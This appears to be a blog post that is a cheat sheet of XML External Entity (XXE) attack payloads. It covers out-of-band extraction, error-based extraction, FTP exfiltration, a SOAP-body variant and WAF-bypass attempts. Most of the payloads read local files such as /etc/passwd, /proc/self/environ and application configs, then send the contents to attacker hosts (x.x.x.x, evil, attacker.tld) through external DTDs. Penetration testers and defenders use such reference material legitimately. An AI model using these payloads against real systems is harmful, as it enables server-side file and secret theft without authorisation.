XXE Payoads


Vanilla, used to verify outbound xxe or blind xxe



<?xml version="1.0" ?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">

]>

<r>&sp;</r>



OoB extraction



<?xml version="1.0" ?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">

%sp;

%param1;

]>

<r>&exfil;</r>


External dtd:



<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">

<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">



OoB variation of above (seems to work better against .NET)



<?xml version="1.0" ?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">

%sp;

%param1;

%exfil;

]>

External dtd:



<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">

<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">


OoB extra nice



<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

<!ENTITY % start "<![CDATA[">

<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">

<!ENTITY % end "]]>">

<!ENTITY % dtd SYSTEM "http://evil/evil.xml">

%dtd;

]>

<root>&all;</root>

External dtd:



<!ENTITY all "%start;%stuff;%end;">


File-not-found exception based extraction



<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE test [

<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >

%one;

%two;

%four;

]>

External dtd:



<!ENTITY % three SYSTEM "file:///etc/passwd">

<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> //you might need to encode this % (depends on your target) as: &#x25;

FTP



<?xml version="1.0" ?>

<!DOCTYPE a [

<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">

%asd;

%c;

]>

<a>&rrr;</a>

External dtd:



<!ENTITY % d SYSTEM "file:///proc/self/environ">

<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">


Inside SOAP body



<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>


Untested - WAF Bypass



<!DOCTYPE :. SYTEM "http://"

<!DOCTYPE :_-_: SYTEM "http://"

<!DOCTYPE {0xdfbf} SYSTEM "http://"

Comments

Post a Comment

Popular posts from this blog

Source Code Review

Image
Introduction Source Code review is a process which discovers hidden vulnerabilities, design flaws, and verifies if key security controls are implemented. Code review helps developers learn the code base, as well as help them learn new technologies and techniques that grow their skill sets. In source code review we are using a combination of scanning tools and manual review to detect insecure coding practices, backdoor, injection flaws, cross site scripting errors, insecure handling of resources, weak cryptography etc. Many claims that this process is time consuming and too costly, but there is no doubt that this process is the fastest and most accurate way to find and diagnose many problems, mostly your code is the base from hackers are taking advantage. There are dozens of security problems that simply can’t be found any other way. A source code review is also the best way to detect intentional or accidental backdoors and logic bombs in applications that you acquire from thi...
Read more

Cyber Security and DFIR Interview Questions

Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in and even if they do, They don't have any idea on what type of questions they might face in an interview. Recently  @Miss_Malware  asked for everyone's favorites security analyst and DFIR interview question that gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview. Note: All These questions have compiled with the help of @Miss_Malware's twitter thread, contribution from friends and very intelligent internet searches :P, All the relevant sources (Read those I remember) have been mentioned at end of the post. GENERAL What is DNS? Differentiate between TCP and UDP? How does HTTP handle state? Does TLS use symmetric or asymmetric encryption? What is "Risk"? What is "Risk...
Read more